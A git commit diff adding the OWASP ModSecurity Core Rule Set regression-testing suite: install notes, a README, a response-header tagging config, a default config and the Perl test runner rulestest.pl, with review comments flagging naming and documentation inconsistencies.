Fixed files overwriting in installer; added OWASP CRS.

Greg Wroblewski
2013-02-05 16:36:29 -08:00
parent 635a573894
commit c1ba71ab16
134 changed files with 33445 additions and 0 deletions

@@ -0,0 +1,21 @@
INSTALLATION STEPS:
1) Edit the rulestest.pl script to define local path to perl
2) Edit the ruletest.conf script to define the proper global settings for:
- servers to test
- path to the modsecurity audit log
3) Copy the testserver.cgi script to the /cgi-bin directory if you wish to
test the outbound/response rules.
4) Edit the modsecurity_crs_10_config.conf file and update/enable the
Regression Testing variable settings.
5) Copy/Symlink the modsecurity_crs_59_header_tagging.conf file to the
activated_rules directory
6) Restart Apache
7) Run the rulestest.pl script using the rules files in the local /tests
directory.
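Review bot: Step 2 names the config file "ruletest.conf" while steps 1 and 7 name the script "rulestest.pl"; the script added in this commit loads "$progname.conf" derived from its own file name, so the file to edit should be called rulestest.conf. Steps 4 and 5 switch on the regression-testing header tagging, which the tagging config itself warns against in normal operation, so a final step that says to disable the variable and remove the symlink once testing is done would be worth adding.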

@@ -0,0 +1,105 @@
ModSecurity Rules regression testing suite
==========================================
Rules regression test tool installation:
----------------------------------------
Test should be run from the same host ModSecurity runs on, or a computer that
has file system access to ModSecurity audit log (see %modseclog in step 5)
1. Copy rulesregtest.pl, rulesregtest.conf and test files to a directory on the
server.
2. Put testserver.cgi in the server's /cgi-bin directory (required only if
outbound tests are used)
3. Set ModSecurity to use serial logging.
4. Ensure that the web server response with 200 to access the home page (since
default tests use "/" as the URL)
5. Edit rulesregtest.conf:
- Server address and port (%server directive). The default (127.0.0.1:80) may
be OK.
- Location of ModSecurity audit log file (%modseclog directive).
Writing tests:
--------------
Write a text file with the following directives:
%test <name> - starts a test and set is name (used for report)
%status <number> - sets the expected status code
%event <string> - set a string to search in the audit log of the test. You can
use multiple directives to define many required patterns. For example:
%event [id "960009"]
%output <string> - set a string to search in the HTTP response. You can use
multiple directives to define many required patterns.
%request <20> multiple lines of the request on the following lines, terminated by
the next directive (a line starting with "%"). A request can include variables
using perl notation ($var). this would be replaced when testing with a value
set by the %var directive.
- Note: Do not forget to leave an empty line as required by HTTP. The script
locks otherwise.
- Note: Content-Length has to be calculated manually.
Finding bugs
------------
The following directives will help to find the problems:
%verbose <20> will output request, reply and new ModSecurity audit log lines for
the current test.
%relevant <20> will output verbose output for tests that failed.
Variable replacement:
---------------------
%var variable=value, value, value<75>.. - Set values for a variable, the test
would be repeated using every value. Values are set only for the current test.
Multiple %var directives for the same variable add values to the list and do
not replace values, so:
%var variable=value1
%var variable=value2
Would test with both value1 and value2.
If multiple variables are used in the same test, than the test is carried for
each combination of values of the variables:
%var var1=v1, v2
%var var3=v3, v4
The test would be repeated 4 times with the test vectors (v1, v3), (v1, v4),
(v2, v3), (v2, v4).
Testing responses:
------------------
To force response content in request, use /cgi-bin/testserver.cgi as the target
URL and add one or more of the following headers to the reuqest:
Response-Status - Force a response status line. Defaults to "200 OK".
Response-Content - Adds the string to the response. Note that this would not be
the entire response.
Response-Content-Type - sets the value of the content type header, defaults to
"text/html"
Response-Header-Name - Add a header to the response. This defined the new
header's name. Response-Header-Value defines the header's value.
Response-Header-Value - The value of the new header defined by the request
header Response-Header-Name. Note: If Response-Header-Name is empty, then this
parameter will be ignored.
** NOT IMPLEMENTED YET **
Response-File - the name of a file to use as the entire response. Name is
reletive to the $RESPONSE_FILE_DIR in the testserver.cgi sctip.
** NOT IMPLEMENTED YET **
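Review bot: The installation steps at the top refer to rulesregtest.pl, rulesregtest.conf and a %modseclog directive, but the script in this commit is rulestest.pl and its directive list accepts "mslog", not "modseclog", so a reader following step 5 would hit "Error 102: syntax error". Suggest using the rulestest names and %mslog throughout. The %request, %verbose, %relevant and %var entries also carry "<20>" and "<75>" byte residue where a dash or ellipsis was intended, and the two "** NOT IMPLEMENTED YET **" markers leave it unclear whether they bracket only Response-File or also the headers above it.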

@@ -0,0 +1,38 @@
#
# This section is only used during regression testing to externalize the matched
# rule IDs in response headers so the testing client can verify matches from
# remote ModSecurity installs.
#
# WARNING: You do not want this in normal operations as this will expose
# the inner workings of your ModSecurity configurations.
#
# Must enable/configure the TX:REGRESSION_TESTING variable in the
# modsecurity_crs_10_config.conf file.
#
SecRule &TX:REGRESSION_TESTING|TX:REGRESSION_TESTING "@eq 0" "phase:4,t:none,nolog,id:'981228',pass,skipAfter:END_RESPONSE_HEADER_TAGGING"
SecRule TX:ANOMALY_SCORE "@eq 0" "phase:4,id:'981229',t:none,nolog,pass,skipAfter:END_RESPONSE_HEADER_TAGGING"
SecRule TX:/^\d*\-/ "." "phase:4,id:'981230',t:none,nolog,pass,setvar:tx.counter=+1,setenv:matched_rule-%{tx.counter}=%{matched_var_name},setenv:anomaly_score=%{tx.anomaly_score},setenv:sql_injection_score=%{tx.sql_injection_score},setenv:xss_score=%{tx.xss_score}"
Header append X-WAF-Events "%{matched_rule-1}e" env=matched_rule-1
Header append X-WAF-Events "%{matched_rule-2}e" env=matched_rule-2
Header append X-WAF-Events "%{matched_rule-3}e" env=matched_rule-3
Header append X-WAF-Events "%{matched_rule-4}e" env=matched_rule-4
Header append X-WAF-Events "%{matched_rule-5}e" env=matched_rule-5
Header append X-WAF-Events "%{matched_rule-6}e" env=matched_rule-6
Header append X-WAF-Events "%{matched_rule-7}e" env=matched_rule-7
Header append X-WAF-Events "%{matched_rule-8}e" env=matched_rule-8
Header append X-WAF-Events "%{matched_rule-9}e" env=matched_rule-9
Header append X-WAF-Events "%{matched_rule-10}e" env=matched_rule-10
Header append X-WAF-Events "%{matched_rule-11}e" env=matched_rule-11
Header append X-WAF-Events "%{matched_rule-12}e" env=matched_rule-12
Header append X-WAF-Events "%{matched_rule-13}e" env=matched_rule-13
Header append X-WAF-Events "%{matched_rule-14}e" env=matched_rule-14
Header append X-WAF-Events "%{matched_rule-15}e" env=matched_rule-15
Header append X-WAF-Events "%{matched_rule-16}e" env=matched_rule-16
Header append X-WAF-Events "%{matched_rule-17}e" env=matched_rule-17
Header append X-WAF-Events "%{matched_rule-18}e" env=matched_rule-18
Header append X-WAF-Events "%{matched_rule-19}e" env=matched_rule-19
Header append X-WAF-Events "%{matched_rule-20}e" env=matched_rule-20
Header set X-WAF-Score "Total=%{anomaly_score}e; sqli=%{sql_injection_score}e; xss=%{xss_score}e" env=anomaly_score
SecMarker END_RESPONSE_HEADER_TAGGING
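Review bot: Rule 981230 increments tx.counter for every matching TX entry, but only matched_rule-1 through matched_rule-20 are mapped to X-WAF-Events, so a request that triggers more than 20 rules loses the remaining IDs with nothing in the response to show it. Suggest stating the limit of 20 in the comment block, or emitting an extra marker header when the counter exceeds it, so a regression test that expects a late rule ID does not fail for an unrelated reason.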

@@ -0,0 +1,20 @@
# Set to the address and port of the web server protected by the tested ruleset.
#
# TODO the web server has to respond with status code 200 to request for the
# home page (/). This is usually the default configuration.
#
# TODO the script 'testserver' should be installed on this web server in the
# /cgi-bin directory to facilitate outbound rules testing.
#
#%global server 127.0.0.1:80
# Set to the path to ModSecurity audit file
#
# TODO set ModSecurity for serial logging.
#
#%global mslog /usr/local/apache/logs/audit.log
#%msdebug /usr/local/apache/logs/debug.log
#
# Set this to the appropriate web site domain name you are testing
#
%global var hostname=mysite
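Review bot: The commented default "#%msdebug /usr/local/apache/logs/debug.log" lacks the global keyword that "#%global server" and "#%global mslog" carry, so once uncommented it would apply only inside this config file and not to the test files parsed after it. Suggest "#%global msdebug ...". The first comment could also say that rulestest.pl has no built-in default for server (only port defaults to 80 in $global_state), so the server line has to be uncommented or -s passed on the command line.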

@@ -0,0 +1,936 @@
#!/opt/local/bin/perl
#
# Copyright (C) 2006-2011 Trustwave All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENCE file for full details.#
# For Internal Use only!
#
# Originally writtern by Ofer Shezaf
#
# !! todo:
# !! ~ request for URI command in conf file
# !! ~ Ensure headers terminators
# !! read rulesets config file for event mane, policy and patterns
# !! fuz patterns from config file
# !! %include directive
use strict;
#use warnings;
#use diagnostics;
use IO::File;
use IO::Socket;
use IO::Select;
use HTTP::Request;
use HTTP::Response;
use Safe;
use Storable qw(dclone);
use Getopt::Long;
use Pod::Usage;
# -- Add library
use FindBin qw($Bin $Script);
use lib "$Bin";
use Data::Dumper;
autoflush STDOUT;
# -- consts
our $SKELETON_REQUEST = <<END_SKEL
GET \$URI HTTP/1.0
Host: local
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
END_SKEL
;
# -- get options
my $global_state = { 'timeout' => '2', 'fuzz' => 1, 'vars' => {}, 'port' => 80 };
$global_state->{'global'} = $global_state;
GetOptions
(
$global_state,
'server|s:s',
'hostname:s',
'port|p:s',
'timeout|t:f',
'mslog:s',
'msdebug:s',
'o:s',
'i=s@',
'run:s@',
'from:s',
'relevant|r!',
'fuzz|f!',
'clean!',
'check!',
'verbose|v!',
'help|h|?',
'man'
) || pod2usage (-exitstatus => 0, -verbose => 0);
pod2usage(-exitstatus => 1, -verbose => 1) if $global_state->{'help'};
pod2usage(-exitstatus => 1, -verbose => 2) if $global_state->{'man'};
push @{$global_state->{'input'}}, @ARGV;
pod2usage (2) if $#{$global_state->{'input'}} < 0;
# -- get list of test files
my $testfiles = [];
my ($progname) = ($Script =~ /(.*)\..*$/);
if (-e "$progname.conf") {
push @$testfiles, "$progname.conf";
}
foreach my $arg (@{$global_state->{'input'}}) {
push @$testfiles, glob $arg;
}
foreach my $file (@$testfiles) {
if (!-e $file) {
print STDERR "Error 101: test file $file not found\n";
exit;
}
}
my ($outfile, $outfilename);
if ($global_state->{'output'}) {
$outfile = new IO::File ">$global_state->{'output'}";
if (!$outfile) {
print STDERR "Error 106: unable to create report file $global_state->{'output'}. $@\n";
exit;
}
$outfilename = $global_state->{'output'};
}
else {
$outfile = *STDOUT;
$outfilename = 'STDOUT';
}
report_header($outfile, $outfilename);
foreach my $filename (@$testfiles) {
parse_test_file ($outfile, $filename, $global_state);
}
exit (0);
# -- read an input file and execute tests in it
sub parse_test_file
{
my ($outfile, $filename, $parent_state) = @_;
my $file_state = inherit_state ($parent_state);
report_file_header($outfile, $filename);
my $linenumber = 0;
my $testfile = new IO::File "<$filename";
if (!$testfile) {
print STDERR "Error 105: unable to open tests file $filename. $@\n";
print $outfile "unable to open file";
return;
}
my $state = $file_state;
while (defined(my $line=<$testfile>)) {
$linenumber++;
$line = tchomp ($line);
$state = parse_test_line ($line, $state, $testfile);
if (!ref $state) {
print STDERR "$state in file $filename at line $linenumber\n";
print STDERR "line: $line\n" if $parent_state->{'check'};
return;
}
while (my $test = shift @{$file_state->{'tests'}}) {
run_test ($outfile, $test, $filename);
}
}
run_test ($outfile, $state, $filename) if $state->{'name'};
}
# -- parse the next input line
sub parse_test_line
{
my ($line, $state, $file) = @_;
# -- Handle EOF
return $state unless defined $line;
# -- Hande multi line remarks
if ($state->{'multi_line_cmd'} eq "remark") {
undef $state->{'multi_line_cmd'} if ($line =~ /^\%endremark/i);
return $state;
}
# -- Handle multi line directives
if (my $incmd = $state->{'multi_line_cmd'}) {
# -- Request parser
if ($incmd =~ /^request$/i) {
if (my ($len) = $line =~ /^Content-Length: (\d+)$/) {
$state->{'request_len'} = $len;
} elsif ($state->{'request_state'} eq 'headers' && $line =~ /^$/) {
$state->{'request_state'} = 'body';
$state->{'multi_line_value'} .= "$line\x0D\x0A";
if (defined $state->{'request_len'}) {
my $result = read $file, my $buffer, $state->{'request_len'};
return "Error 110: Error reading file" if !defined $result;
return "Error 111: File terminated unexpectedly (read $result char of required $state->{'request_len'})" if $result != $state->{'request_len'};
#print "==>$state->{'multi_line_value'}<==\n$buffer\n----\n";
$state->{'multi_line_value'} .= $buffer;
return $state;
undef $state->{'request_len'};
}
}
}
# X-Real-Content-Length:
# -- Append to value if not yet next directive
if ($line !~ /^\%/) {
$state->{'multi_line_value'} .= "$line\x0D\x0A";
return $state;
}
# -- Otherwise use directive
$state = use_test_directive ($state, $incmd, $state->{'multi_line_value'}, $state->{'multi_line_global'});
return $state if (!ref $state);
undef $state->{'multi_line_cmd'};
undef $state->{'multi_line_value'};
undef $state->{'request_len'};
}
# -- Handle empty lines and single line remarks
return $state if $line =~ /^\s*(\#|$)/;
# -- Parse directive
my ($global);
$line =~ /^\%(\w+)\s*(.*)?$/;
my ($cmd, $operand) = ($1,$2);
if ($cmd =~ /^global$/i) {
$global = 1;
($cmd, $operand) = ($operand =~ /^\s*(\w+)\s*(.*)?$/);
}
if (!$operand) {
$operand = 1;
if ($cmd =~ /^no(.*)$/) {
$cmd = $1;
$operand = 0;
}
}
$cmd = lc $cmd;
# -- Start multi line directives
if ($cmd =~ /^(?:request|remark)$/i) {
$state->{'multi_line_cmd'} = $cmd;
$state->{'multi_line_global'} = $global;
return $state;
}
return use_test_directive ($state, $cmd, $operand, $global);
}
sub use_test_directive
{
my ($state, $cmd, $operand, $global) = @_;
# -- Simple directives
if ($cmd =~ /^(?:server|port|hostname|timeout|verbose|relevant|mslog|msdebug|request|uri|request|fuzz|clean|pause)$/i) {
if ($global) {
$state->{'global'}->{$cmd} = $operand;
}
$state->{$cmd} = $operand;
$state->{'request_state'} = 'headers';
}
# -- List directives
elsif ($cmd =~ /^(?:status|remote_event|event|audit|output)$/i) {
push_state ($state, $state->{'global'}, $cmd, $global, $operand);
}
# -- Variable assignment
elsif ($cmd =~ /^(?:var)$/i) {
my ($var, $values) = ($operand =~ /\s*(\w+)\s*=\s*?(.*)/);
my @values = split /\s*,\s*/, $values;
push_state ($state->{'vars'}, $state->{'global'}->{'vars'}, $var, $global, @values);
}
# -- End test (return to file context)
elsif ($cmd =~ /endtest/i) {
if ($state->{'name'}) {
push @{$state->{'parent'}->{'tests'}}, $state;
}
else {
return "Error 107: %endtest directive without a preceding %test directive";
}
$state = $state->{'parent'};
}
# -- New test (end test and start a new one)
elsif ($cmd =~ /test/i) {
if ($state->{'name'}) {
push @{$state->{'parent'}->{'tests'}}, $state;
$state = inherit_state ($state->{'parent'});
}
else {
$state = inherit_state ($state);
}
$state->{'name'} = $operand;
}
# -- error
else {
return "Error 102: syntax error";
}
return $state;
}
sub reconfigure
{
my ($state) = @_;
my ($restart) = 0;
if ($state->{'clean'}) {
unlink $state->{'mslog'} if $state->{'mslog'};
unlink $state->{'msdebug'} if $state->{'msdebug'};
$restart = 1;
global_clear ($state, 'clean');
}
if ($restart) {
print "## Restarting apache\n";
print STDERR `/usr/local/apache/bin/apachectl restart`;
sleep (1);
}
}
sub inherit_state
{
my ($state) = @_;
my $clone = dclone $state;
$clone->{'parent'} = $state;
$clone->{'global'} = $state->{'global'};
delete $clone->{'tests'};
return $clone;
}
# -- Add values to key in state taking into about both overriding and global
sub push_state
{
my ($hash, $global_hash, $key, $global, @values) = @_;
if ($global) {
push @{$global_hash->{$key}}, @values;
}
elsif (!$hash->{"_OVERRIDE_$key"}) {
$hash->{$key} = [];
}
$hash->{"_OVERRIDE_$key"} = 1;
push @{$hash->{$key}}, @values;
}
sub global_clear
{
my ($state, $key) = @_;
while ($state) {
undef $state->{$key};
$state = $state->{'parent'};
}
}
sub run_test
{
my ($outfile, $state, $file) = @_;
return if $state->{'check'};
if ($state->{'from'}) {
return if $state->{'name'} !~ /$state->{'from'}/;
}
global_clear ($state, 'from');
my $do_test = $#{$state->{'run'}} < 0;
foreach my $select (@{$state->{'run'}}) {
$do_test ||= ($state->{'name'} =~ /$select/);
}
return if !$do_test;
if ($state->{'request'} && $state->{'uri'}) {
print STDERR "Error 103: cannot use both %request and %uri in test $state->{'name'} in file $file\n";
exit;
}
reconfigure($state);
if ($state->{'uri'}) {
$state->{'request'} = $SKELETON_REQUEST;
$state->{'request'} =~ s/\$URI/$state->{'uri'}/;
}
my $requests = $state->{'fuzz'} ?
generate_vectors ($state->{'request'}, $state->{'vars'}, $state->{'verbose'}) :
{'' => $state->{'request'}};
VECTOR: while (my ($vars, $request) = each %$requests)
{
my $test = inherit_state ($state);
$test->{'request'} = $request;
if ($test->{'mslog'}) {
my $output = `wc $test->{'mslog'}`;
$output =~ /\s*(\d+)/;
$test->{'mslog_start'} = $1;
}
if ($test->{'msdebug'}) {
my $output = `wc $test->{'msdebug'}`;
$output =~ /\s*(\d+)/;
$test->{'msdebug_start'} = $1;
}
my ($server, $port) = ($test->{'server'}, $test->{'port'});
if (!$port && ($server =~ /^(.+)\:(\d+)$/)) {
$server = $1;
$port = $2;
}
if ($test->{'hostname'}) {
my $hostname = ($test->{'hostname'});
}
my $sock = IO::Socket::INET->new(PeerAddr => $server, PeerPort => $port);
if (!$sock) {
print STDERR "Error 104: error connecting to server $server. $@\n";
exit;
}
print $sock $request;
my $line;
do {
my @ready;
@ready = IO::Select->new($sock)->can_read($test->{'timeout'});
if ($#ready < 0) {
$test->{'response'} = $test->{'response_status'} = "N/A";
report_test ($outfile, 'TIMEOUT', $test, $request, $vars);
next VECTOR;
}
if (defined($line = <$sock>)) {
$test->{'response'} .= $line;
if (!$test->{'response_status'}) {
if ($line =~ /^HTTP\S*\s+(\d+)/) {
$test->{'response_status'} = $1;
}
elsif ($line =~ /<title>400 Bad Request<\/title>/) {
$test->{'response_status'} = 400;
}
}
}
} while (defined($line));
if ($test->{'mslog'}) {
my $output = `wc $test->{'mslog'}`;
$output =~ /\s*(\d+)/;
my $lines = $1 - $test->{'mslog_start'};
$test->{'mslog'} = `tail -n $lines $test->{'mslog'}`;
}
if ($test->{'msdebug'}) {
my $output = `wc $test->{'msdebug'}`;
$output =~ /\s*(\d+)/;
my $lines = $1 - $test->{'msdebug_start'};
$test->{'msdebug'} = `tail -n $lines $test->{'msdebug'}`;
}
$test->{'match_status'} = check_match ($test->{'response_status'}, $test->{'status'});
$test->{'match_output'} = check_match ($test->{'response'}, $test->{'output'});
$test->{'match_audit'} = !$test->{'mslog'} || check_match ($test->{'mslog'}, $test->{'audit'});
my $test_events;
foreach my $event (@{$test->{'event'}}) {
if ($event =~ /^\!(.*)$/) {
push @$test_events, "!\\[id \\\"$1\\\"\\]"
}
else {
push @$test_events, "\\[id \\\"$event\\\"\\]"
}
}
$test->{'match_events'} = !$test->{'mslog'} || check_match ($test->{'mslog'}, $test_events);
my $result =
($test->{'match_status'}
&& $test->{'match_output'}
&& $test->{'match_audit'}
&& $test->{'match_events'}) ? "OK" : "FAIL" ;
report_test ($outfile, $result, $test, $request, $vars);
sleep $test->{'pause'} if $test->{'pause'};
}
}
sub check_match
{
my ($text, $patterns) = @_;
my $match = 1;
foreach my $pattern (@$patterns) {
if ($pattern =~ /^\!(.*)$/) {
return 0 if $text =~ /$1/sm;
}
else {
return 0 if $text !~ /$pattern/sm;
}
}
return $match;
}
sub report_header
{
my ($outfile, $outfilename) = @_;
print $outfile "\nModSecurity rules test report generated to $outfilename on " . localtime() . "\n";
print $outfile "Produced by rulestest.pl, (c) Trustwave Holdings Inc, 2012\n";
}
sub report_file_header
{
my ($outfile, $filename) = @_;
print $outfile "\n## reading tests file $filename\n";
}
sub report_test
{
my ($outfile, $result, $test, $request, $vars) = @_;
print $outfile "\n" if $result ne "OK";
print $outfile "$result: ";
print $outfile "$test->{'name'}";
print $outfile " ($vars)" if $vars;
print $outfile ", status = $test->{'response_status'}";
#print $outfile ", X-WAF-Event Match" if ($test->{'match_output'});
my (@events) = ($test->{'mslog'} =~ /\[id \"(\d+)\"\]/gim);
print $outfile $#events < 0 ? ", no events received" : ", event(s) = " . (join ",", @events) ;
if ($result eq "FAIL") {
print $outfile "\n";
if (!$test->{'match_status'}) {
print $outfile "Expected status code(s): " . (join ",", @{$test->{'status'}}) . "\n";
}
if (!$test->{'match_events'}) {
print $outfile "Expected event(s): " . (join ",", @{$test->{'event'}}) . "\n";
}
if (!$test->{'match_audit'}) {
print $outfile "Audit does not match\n";
}
if (!$test->{'match_output'}) {
print $outfile "Output does not match\n";
}
#$test->{'match_events'} && print "Events: $test->{'response_status'} and not " . (join ",", $test->{'status'}) . "\n";
print_details ($test) if $test->{'verbose'} || $test->{'relevant'};
}
print $outfile "\n";
print_details ($test) if $test->{'verbose'};
}
sub print_details
{
my ($test) = @_;
print $outfile "---------\nRequest:\n$test->{'request'}\n";
print $outfile "---------\nResponse:\n$test->{'response'}\n";
print $outfile "---------\nLog:\n$test->{'mslog'}\n" if ($test->{'mslog'});
print $outfile "---------\nDebug:\n$test->{'msdebug'}\n" if ($test->{'msdebug'});
}
sub generate_vectors
{
my ($script, $vars, $verbose) = @_;
my $test_requests = [];
my $vectors = [ {} ];
while (my ($var, $values) = each %$vars) {
next if $var =~ /^_OVERRIDE_/;
next if $script !~ /\$$var\b/;
foreach my $vector (@$vectors) {
$vector->{$var} = $values->[0];
}
if ($#$values > 0) {
my $collect_vectors = [];
shift @$values;
foreach my $value (@$values) {
my $new_vectors = dclone $vectors;
foreach my $vector (@$new_vectors) {
$vector->{$var} = $value;
}
push @$collect_vectors, @$new_vectors;
};
push @$vectors, @$collect_vectors;
}
}
$script =~ s/\$([a-zA-Z_]+)/\$vector->{$1}/g;
#print "SCRIPT=>$script\n";
my $results;
foreach our $vector (@$vectors) {
my $var = join ",", map { "$_=$vector->{$_}" } keys %$vector;
$vector->{'CONTENT_LENGTH'} = '$CONTENT_LENGTH';
my $result;
if (!defined($result = eval_expression ($script, $vector, $verbose))) {
print STDERR "Error 109: unable to fuzz request. Not fuzzing test.\n";
return ({'' => $script});
}
#my $req = HTTP::Request->parse($result);
my ($content) = $result =~ /.*?\x0D\x0A\x0D\x0A(.*)/sm;
$vector->{'CONTENT_LENGTH'} = length $1;
$result = eval_expression ($script, $vector, $verbose);
$results->{$var} = $result;
}
return $results;
}
sub eval_expression
{
my ($script, $vector, $verbose) = @_;
$script =~ s/([\"\@\%])/\\$1/g;
my $result;
my $warn;
local $SIG{__WARN__} = sub { $warn = $_[0] };
eval {
my $safe = new Safe;
$safe->share ('$vector');
$result = $safe->reval ("return \"$script\"");
};
if ((my $error = $@) || $warn) {
print STDERR "Error 108: unable to evaluate expression\n";
print STDERR "SCRIPT: $script\n" if $verbose;
print STDERR "EVAL ERROR: $error\n" if $error && $verbose;
print STDERR "EVAL WARNING: $warn\n" if $warn && $verbose;
return undef;
}
return $result;
}
sub tchomp {
my ($text) = @_;
$text =~ s/^(.*?)(?:\x0D\x0A|\x0A|\x0D|\x0C|\x{2028}|\x{2029})/$1/s;
return $text;
}
__END__
=head1 NAME
rulestest.pl
=head1 SYNOPSIS
rulestest.pl [options] [test files ...]
This program reads and executed tests in input test file(s) agains a
ModSecurity protected web application.
use -help for options.
use -man for detailed usage information.
=head1 OPTIONS
the following options can be used either on the command line or (using the
long version) as directives (prefixed by %) in test files.
-s or -server <address>[:<port>]
address of server to send. Mandatory before any test, but can appear
in the test files themselves
-p or -port <port>
port to send tests to, defaults to 80
-t or -timeout <time>
time in seconds, possibly fractional, to wait for server response.
If the server does not respond within this period the test fails.
the default is 10 seconds.
Timeout should be small for synthetic tests, such as those
generated from capture files as the server would respond fast.
The timeout may need to be longer for real world servers.
-f or -fuzz
Whether to use fuzzing or not. You may not want to use fuzzing in
case the requests where generated automatically and may includes
syntax that will be considered by rulestest as substitutable
variables.
-mslog <file name>
ModSecurity log file to search for events in. If not specified
events are not (useful if tests are not run locally).
-msdebug <file name>
ModSecurity debug file to extract debug information
to test report. If not specified, debug information is not
add to the report.
-o <file name>
name of output file. Defaults to STDOUT. Not relevant as directive
in test files.
-i <file name>
Names of input files. can also appear as parameters on the command
line. Not relevant as directive in test files.
-check
Does not run test but only parses the input file
-run <regular expression>
a regular expresion to select tests to perfrom. Only tests whose
name match the regular expression are executed. The option
(or directive) can be used multiple times, so a test matching
any of the regular expressions will be executed.
-from <regular expression>
a regular expression selecting the first test to perform.
-r or -relevant
Detailed information in the test report in case
of a test failure.
-v or -verbose
Detailed information for all tests. Verbose will also cause specific
errors to include print more information.
-c or -clean
deletes log and debug files and restart apache (using apachctl).
Significantly enhance performance of the tests and can be used as
many times as needed in test files.
Clean is executed once, when starting the 1st test after it is
defined regardless of the scope it is defined at. Specifically
it will remove the log and debug files as defined when the test
start: this enables the use of -clean on the command line even
though file locations are defined only later on, for example in
rulestest.conf.
=head1 INSTALLATION & CONFIGURATION
Test should be run from the same host ModSecurity runs on, or a computer that
has file system access to ModSecurity audit log to. This allows rulestest to
examine ModSecurity audit log for events and extract information from
ModSecurity debug log to the test report.
In order to test for events, ensure that ModSecurity is set use serial logging.
=head2 Local and Global Settings:
When used in a file, directives are local to the file, and when used whithin
a test they are local to a test. To specify global settings preced the directive
wiht the keyword global:
%global server 127.0.0.1:80
if a file with the name rulestest.conf exists in the same directory as the
script, it will be read. I can contain any directive valid in a test file.
It can be used to set default
=head2 Binary Attrbiutes:
Directives that except a yes/no value can be set in varios ways. Providing the
value 0 or 1 will set them to no and yes respectively. The directive without
any values is eqvivalent to setting it to 1, and the directive preceded by "no"
is eqvivalent to 0, for example:
%noverbose
will set the current scope to not report verbosely.
=head2 Default Settings:
The file rulestest.conf is automatically read by rulestest.pl before any
tests file and may contain global setup directives. You may especially want to
set there settings such as %server, %mslog and %msdebug as well as reporting
level using %verbose and %relevant.
=head1 WRITING TESTS
To write a test use the following directives:
=head2 defining the test request
%test <name> -
starts a test and set is name as shown in the report
%endtest -
used to terminate a test. Ususally there is no need to use this
directive as the next %test directive implicitly defines the end of
a test. You may want to use it if you want to set additional file
level settings for the remaining tests.
%remark -
Ignore all lines (including directives) until a matching %endremark
directive. use # at the beginning of a line to add a remark line to
the file, if not in the middle of a multi-line directive such as
%request.
%request -
multiple lines of the request should appear on the lines follwing
the directive terminated by the next =directive (a line starting
with "%"). Do not forget to leave an empty line as required by
HTTP.
You can use the special variable $CONTENT_LENGTH to have
rulestest set the correct content length for the request.
$CONTENT_LENGTH can save counting, but its main use is to enable
fuzzing of requests with variables in the post data.
%uri -
a uri to send to the server. it would be embedded in a
standard request
%pause -
define a delay in seconds after the test and before the next test.
Useful if the feature tested involves timeouts.
either a %uri or a %request directive must appeat in a test. A %request or a
%uri can include variables using perl notation ($varname). this would be
replaced when testing with a value set by the %var directive.
Empty lines are skipped if not in the middle of multi-line directives such
as %request.
=head2 defining expected output
%status <regexp> -
The expected response status code(s).
%event <regexp> -
A regexp that should match event ids generated by the test in
the audit log.
%audit <regexp> -
A regexp that should match in the audit log of the test.
%output <regexp> -
A regexp that should match in set a string to search in the HTTP
response. You can use multiple directives to define many required
patterns.
for %event, %audit and %output you can use multiple directives to define
many required patterns. All of them must match for the rule to match. Use the
regular expresion or (|) option to check for at least one option from a group
of patterns.
Each regular expression can be preceded by a "!" mark to negate the test. the
regular expression following must not appear in the test result.
=head1 REPORTING
By default rulestest will provide brief message describing if the test succeded
in any of the checks done: status code, events generated, pattern in audit log
and pattern in response.
the following directives allow control on the level of details of the report:
%verbose -
from the test for which the directive appears onward, output request,
reply and new ModSecurity audit log lines for each test. set to 0 to
stop (1 is implicit on set).
%relevant -
from the test for which the directive appears onward, output verbose
output for tests that failed any check. set to 0 to stop (1 is
implicit on set).
In most cases, you will only be interested in the failed tests. In that case,
you can use awk with the following command:
gawk '$1=="OK:" {printme=0}; $1=="FAIL:" {printme=1}; $1=="##" {printme=1}; printme==1 {print}'
=head1 VARIABLE SUBSTITUTION (FUZZING)
The directive "%var variable=value[, value[, valueM-^E..]] sets values for a
variable which are embedded in the request sent. The test would be repeated
using every value. Values are set only for the current test. Use the
%globalvar directive to set global variables.
Multiple %var directives for the same variable add values to the list and do
not replace values, so:
%var variable=value1
%var variable=value2
Would test with both value1 and value2.
If multiple variables are used in the same test, than the test is carried for
each combination of values of the variables:
%var var1=v1, v2
%var var3=v3, v4
The test would be repeated 4 times with the test vectors (v1, v3), (v1, v4),
(v2, v3), (v2, v4).
As noted before, the special variable $CONTENT_LENGTH can be used to
automatically calculate the content length based on the actually generated
request after variable substitution.
=head1 TESTING RESPONSES
In order for outbound tests the script testserver.cgi has to be installed in
the web server's /cgi-bin directory.
To force response content in request, use /cgi-bin/testserver.cgi as the target
URL and add one or more of the following headers to the reuqest:
Response-Status: - Force a response status line. Defaults to "200 OK".
Response-Content: - Adds the string to the response. Note that this would not be
the entire response.
Response-Content-Type: - sets the value of the content type header, defaults to
"text/html"
Response-Header-Name: - Adds a header to the response. This defined the new
header's name. Response-Header-Value defines the header's value.
Response-Header-Value: - The value of the new header defined by the request
header Response-Header-Name. Note: If Response-Header-Name is empty, then this
parameter will be ignored.
=head1 ERRORS
Error 101:
test file <file> not found. Check that all options are valid and no
option was considered a test file.
Error 102:
syntax error in file <file> on line <line>. a line which is not
a remark, not a directive and not in any multiline section (request
and multi line remark) was found at specified line and file.
Error 103:
cannot use both %request and %uri. Only one of these directive can
be specified in each test.
Error 104:
error connecting to server. The specific error is also displayed.
This error usually implies a communication problem or specificaiton
of a wrong server or port.
Error 105:
Error occured when trying to open a tests file. Tests will continue
with next tests file.
Error 106:
Error occured when trying to create report file.
Error 107:
%endtest directive without a preceding %test directive
Error 108:
The expression evulator (using Perl eval function) failed. The
expression probably includes some Perl syntax. use -verbose to
print the actual error returned.
Error 109:
Fuzzing the request failed. This probably implies that the test
request includes some Perl syntax. You may want to use the nofuzz
option to overcome the problem.
=cut
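
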